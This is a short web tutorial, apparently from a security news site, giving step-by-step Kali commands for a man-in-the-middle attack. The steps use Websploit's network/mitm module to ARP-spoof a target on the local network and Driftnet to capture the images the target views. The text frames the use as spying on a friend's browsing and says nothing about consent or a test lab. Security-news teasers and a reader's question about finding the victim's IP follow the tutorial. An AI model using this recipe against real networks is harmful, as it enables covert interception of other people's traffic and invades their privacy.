How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.
MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.
Step 1: Need to install websploit in Kali if not present.
root@kali:~# apt-get install websploit
Step2: To Run the websploit
root@kali:~# websploit
Step 3: Next we need to list the modules with the websploit.
wsf > show modules
Step 4: Need to select network/mitm under Network modules.
wsf > use network/mitm
wsf:MITM > show options
Interface: Need to specify the network adapter interface based on our network adapter.
Router: Need to specify Router IP, which can be found with the command route -n.
set Router (Gateway IP)
Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.
Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.
wsf:MITM > run
Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.
Here you can find the pictures that your friend watching online.
If you have any doubt please don’t hesitate to leave a comment.
Multiple Xerox printer models, including EC80xx, AltaLink, VersaLink, and WorkCentre, have been identified as vulnerable…
Cisco has issued a critical security advisory regarding a vulnerability in its Adaptive Security Appliance…
Google has released several security patches for its Chrome browser, addressing critical vulnerabilities that malicious…
Grayscale Investments, a prominent crypto asset manager, has reportedly suffered a data breach affecting 693,635…
A database containing over 1,000 email accounts associated with the National Health Service (NHS) has…
Researchers from Avast have uncovered a vulnerability in the cryptographic schema of the Mallox ransomware,…
View Comments
as you mentioned above (Victim machine IP address, can be found with ipconfig for windows and ifconfig for Linux.) for this we need the physical access to the victims machine right? I'm confused here please help me!